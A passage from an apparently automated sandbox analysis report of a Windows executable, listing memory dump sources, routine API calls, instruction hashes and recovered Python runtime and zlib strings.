                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$System$FileLocalSpecific
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1707611234-0
                                                                                                                                  • Opcode ID: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
                                                                                                                                  • Instruction ID: 4d9324841ceb11774beacaa02a19636176de90393e27b2aa8c33797f56dadd0e
                                                                                                                                  • Opcode Fuzzy Hash: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
                                                                                                                                  • Instruction Fuzzy Hash: D2118F2160C60281EA64AB11AC5113FF7E1FB85775F900236EAAD859E8EF6CD414DF10
                                                                                                                                  APIs
                                                                                                                                  • RtlFreeHeap.NTDLL(?,?,?,00007FF7262B2032,?,?,?,00007FF7262B206F,?,?,00000000,00007FF7262B2535,?,?,?,00007FF7262B2467), ref: 00007FF7262A9C6E
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF7262B2032,?,?,?,00007FF7262B206F,?,?,00000000,00007FF7262B2535,?,?,?,00007FF7262B2467), ref: 00007FF7262A9C78
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                  • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                  • Instruction ID: c26dba23150abce8744a2dcbe695899df7a50dec91a11a892ac8aee480940554
                                                                                                                                  • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                  • Instruction Fuzzy Hash: 03E04610F08A8246FB187BB2AC442BB92D2DF98711FD48032CD0D96291EFACE8458A20
                                                                                                                                  APIs
                                                                                                                                  • CloseHandle.KERNELBASE(?,?,?,00007FF7262A9CE5,?,?,00000000,00007FF7262A9D9A), ref: 00007FF7262A9ED6
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF7262A9CE5,?,?,00000000,00007FF7262A9D9A), ref: 00007FF7262A9EE0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseErrorHandleLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 918212764-0
                                                                                                                                  • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                  • Instruction ID: 49e0692f1959d1a7edf2caac0045f852f8dae43164342b2f046f18afcdf27a6f
                                                                                                                                  • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                  • Instruction Fuzzy Hash: 7E219511F2864241EF547761AD5037AE2D2EF847B0F944237DA2D576D2CFACE8408B61
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                  • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                  • Instruction ID: 178f92507b60bebc8b5897a34c92186ba41a04086c2024c205b6678b7658ac6f
                                                                                                                                  • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                  • Instruction Fuzzy Hash: 8941A23291820187EA24EF15AD4127EB7E0EB557A1F940133D68A87A91CFBCE942CF61
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _fread_nolock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 840049012-0
                                                                                                                                  • Opcode ID: 975c3a5ec649139404ac52ecddea46541f176f5586f0ae2f8c4f26f5f44efa62
                                                                                                                                  • Instruction ID: 8f27a15fe488056522e538f1f62c72a0a0e10e4970e9857f7f266874bb3fd1fd
                                                                                                                                  • Opcode Fuzzy Hash: 975c3a5ec649139404ac52ecddea46541f176f5586f0ae2f8c4f26f5f44efa62
                                                                                                                                  • Instruction Fuzzy Hash: 63218511B0A65145FA14BA16AD043FBE691FF85BD4FE84832DD0D0B786EF7DE541CA20
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                  • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                  • Instruction ID: 0cf3851bf38307af15ec971762f9cfe105060ee77d40ac907ef557c36691ef7c
                                                                                                                                  • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                  • Instruction Fuzzy Hash: C4316922A1864286F611BB158C412BEA6D1EF50BB0FA10237EA5D073D2CFFDE8418B31
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3947729631-0
                                                                                                                                  • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                  • Instruction ID: fdd89e40ee1cf9db6f851b5114c4ddf06e6bf332d0f0e3b847f8dca096d3e101
                                                                                                                                  • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                  • Instruction Fuzzy Hash: A3218D32A15A0589EB24AF64CC402AD73E1FB04728F84063BD62C06AC5DF7CD844CFA0
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                  • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                  • Instruction ID: 3aaed8a04a857feea5062d1cbf0d3d865b005689aafad9786d9ea776a70a45b5
                                                                                                                                  • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                  • Instruction Fuzzy Hash: 30115721A1D64141EA60BF519C0017FE2E4EF55BA0F944533EE4C67A95CFBCDC418F60
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                  • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                  • Instruction ID: 397b674c482a21665ce2dd7300908763c4f594ea048548df13224f2e3d216e45
                                                                                                                                  • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                  • Instruction Fuzzy Hash: 7321AA3261864286DB61AF18DC4037AB6E4EB88B94F944336DB5D4B6D9DF3CD800CF10
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                  • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                  • Instruction ID: beb0f5aa7f501bd3f5bedb07bc01033bc18b8e9655b5ccbeb8c16f417ee0b01e
                                                                                                                                  • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                  • Instruction Fuzzy Hash: FF01A521A0878240EA44FB565D001AAE6D5EB95FE0F984632DE6C1BBD6EF7CD5028B10
                                                                                                                                  APIs
                                                                                                                                  • HeapAlloc.KERNEL32(?,?,00000000,00007FF7262AA63A,?,?,?,00007FF7262A43FD,?,?,?,?,00007FF7262A979A), ref: 00007FF7262ADEFD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                  • Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                  • Instruction ID: bfe1a44d61989309191c5723c1e096ed49a094d6d9700320331989082eceb777
                                                                                                                                  • Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                  • Instruction Fuzzy Hash: 07F06D14B0924781FE5476625D513B7D2D0DFA8BA0FD84837DD0E862C1EFACED858A30
                                                                                                                                  APIs
                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,00007FF72629FFB0,?,?,?,00007FF7262A161A,?,?,?,?,?,00007FF7262A2E09), ref: 00007FF7262AC94A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                  • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                  • Instruction ID: 03bcffa48be77ddeea9c39859927d1bf3d18f41d9f7f733ad92febefe4a68c5c
                                                                                                                                  • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                  • Instruction Fuzzy Hash: 3AF05E11F19247C5FE1476625E5137791C0DF487B4FC892329D2E462C1DF9CE8448930
                                                                                                                                  APIs
                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF726295C57,?,00007FF72629308E), ref: 00007FF7262950C0
                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF726295C57,?,00007FF72629308E), ref: 00007FF726295101
                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF726295C57,?,00007FF72629308E), ref: 00007FF726295126
                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF726295C57,?,00007FF72629308E), ref: 00007FF72629514B
                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF726295C57,?,00007FF72629308E), ref: 00007FF726295173
                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF726295C57,?,00007FF72629308E), ref: 00007FF72629519B
                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF726295C57,?,00007FF72629308E), ref: 00007FF7262951C3
                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF726295C57,?,00007FF72629308E), ref: 00007FF7262951EB
                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF726295C57,?,00007FF72629308E), ref: 00007FF726295213
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc
                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                  • API String ID: 190572456-2007157414
                                                                                                                                  • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                  • Instruction ID: 0a7df014794757889e46aca791ea389e40a85139e0bb237d84f6659642740930
                                                                                                                                  • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                  • Instruction Fuzzy Hash: 0F129964A0EB03D0FA15BB04AD502B6A3E4EF4D755FE42437C80E252A0EF7DB6499A70
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                  • API String ID: 808467561-2761157908
                                                                                                                                  • Opcode ID: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
                                                                                                                                  • Instruction ID: 1a46dd337a678bdc3d52ac5420be8dd4532fcecdadc93028c1c676014bf303dd
                                                                                                                                  • Opcode Fuzzy Hash: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
                                                                                                                                  • Instruction Fuzzy Hash: 02B2D572E182928BE7259E64DD407FEB7E1FB58388F945136DA0D57A88DB38E900CF50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                  • API String ID: 0-2665694366
                                                                                                                                  • Opcode ID: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
                                                                                                                                  • Instruction ID: 7b25b559daa8b37cad60f71a8f49adff7144ea33f1174cd9115bc93568421df0
                                                                                                                                  • Opcode Fuzzy Hash: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
                                                                                                                                  • Instruction Fuzzy Hash: 19520372A157A64BE7549F14CC48BBE7BE9FB84300F95413AE64A97780EB3DDA40CB10
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                  • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                  • Instruction ID: 2514584ff147d0c43ca9462a9cd24605faf19952253b162ab508a60991bd3385
                                                                                                                                  • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                  • Instruction Fuzzy Hash: 13311F72709A81C5EB609F60EC407EE73A4FB89744F44503ADA4D57B95EF38D648CB20
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
